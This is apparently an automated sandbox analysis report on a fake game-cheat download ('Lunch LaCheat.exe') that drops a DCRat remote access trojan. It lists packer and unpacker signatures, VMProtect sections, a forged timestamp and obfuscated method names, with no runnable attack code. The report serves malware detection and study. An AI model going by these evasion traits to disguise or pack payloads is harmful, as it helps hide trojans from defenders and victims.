00000023.00000003.1808042217.0000000004E9A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        .NET source code contains potential unpacker
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs.Net Code: wxQMPJUTVO
                        Source: 52cheatand52rat.exe.34.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\blockweb\__tmp_rar_sfx_access_check_4136515Jump to behavior
                        Source: Lunch LaCheatV2.exe.0.drStatic PE information: section name: .vmp0
                        Source: Lunch LaCheatV2.exe.0.drStatic PE information: section name: .vmp1
                        Source: Lunch LaCheat.exe.1.drStatic PE information: section name: .vmp0
                        Source: Lunch LaCheat.exe.1.drStatic PE information: section name: .vmp1
                        Source: DCRatBuild.exe.34.drStatic PE information: section name: .didat
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074E28C push eax; ret 35_2_0074E2AA
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074CAC9 push eax; retf 0074h35_2_0074CACE
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074ED46 push ecx; ret 35_2_0074ED59
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeCode function: 36_2_00007FFD9BAA5D50 push esi; retf 36_2_00007FFD9BAA5D64
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeCode function: 36_2_00007FFD9BAA00BD pushad ; iretd 36_2_00007FFD9BAA00C1
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, X1FXHctVq7kE4pJRmYh.csHigh entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, XfZ5nTqO2eBgWgje4xu.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Lt3DSvqMxZcQ5oZBmim.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Jb85v1sq6IWCtQ7Vqu.csHigh entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, vK3PiltUTHMLVDrDT8n.csHigh entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, q8LHkBqBZc0BmxvQWYH.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, VwsI0eXAjxgDO5eO946.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, z8gUbRX871YUO6KvEjH.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ix9Miew8MmrhPUW6iG7.csHigh entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ctiO1aUb80GXStvVQ3f.csHigh entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nhbQX4wTCE0caeKIHB.csHigh entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Yarf2vfPQwRKas0dOld.csHigh entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, RSx3mxln0wS0orPm0E.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Au6u9NXX2BPw1dlx1cN.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Thw6BMqwvwHF16riBkP.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, OKOFf3AyEOTeQ8sF02.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, iWMFUTm5Qgip1Z9i3E.csHigh entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, suwuZqqUaCC4bv2jsNt.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csHigh entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, r1Nd7VMgjpfgH8UhQxo.csHigh entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, dVUBQucrV6vLHbsrlB.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bWvKHFeX1fCoZwKOW0.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, gKJnY3fffZyAJh7UTXY.csHigh entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, v1H9NwqEOJDUB1tm5YX.csHigh entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Fnr6ywMQNBPcTXUFQeh.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wqRwrbX1J1I0lijql3J.csHigh entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, SnxHSTqDkQ0SnKZtlax.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zmTxvPtB3JXpW99rT2g.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nKFhZaGINSnlIuOGr6.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, MZcSW5XFnMZt2tTbkg5.csHigh entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, WWqZNXK75NEoPq9OON.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.csHigh entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, jnVE0AqQ75AvvmYSO4D.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, GXbGVUq9ec7tQ7QY4FA.csHigh entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, S4xuYYf4VvkDUfoJrma.csHigh entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, spviIXXITu8HiQLRydd.csHigh entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bjx4PUMNvrbRTipVjsL.csHigh entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mGRo5IqgkpbCevtLJw4.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, n5BLl0zub6q1E6cKtB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, d1Ms4CUYfOkEyT4rV8O.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zyKIFSUOvZVd5nfJLNC.csHigh entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csHigh entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LyW9xXtR93TyJkM7URN.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, JLb518Xu0gr7VgNrdQG.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zWT2AgqN8s5bxJgQo4x.csHigh entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Sb38j9M5TwPKU5E3N8P.csHigh entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, hYxb1wtLnXrN0rRtimV.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, I9vhRHquCQ0uLDtMftj.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ckfw2rtlq8EL44wGQV0.csHigh entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, diijDZfkEAwvm72umcW.csHigh entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, w22xDBMq7bbo3Ga2veg.csHigh entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, whZPVLpQKsuh7sYp2i.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, U9iiGtqq03BTIAdKv3Z.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, a8RCXJfyfv2YevbKcJy.csHigh entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, HhoQgiQALbTCJrMygA.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, COtroIUMm4eTIhOVxcs.csHigh entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, vf0yC3MIHlCBxsJ9ID0.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
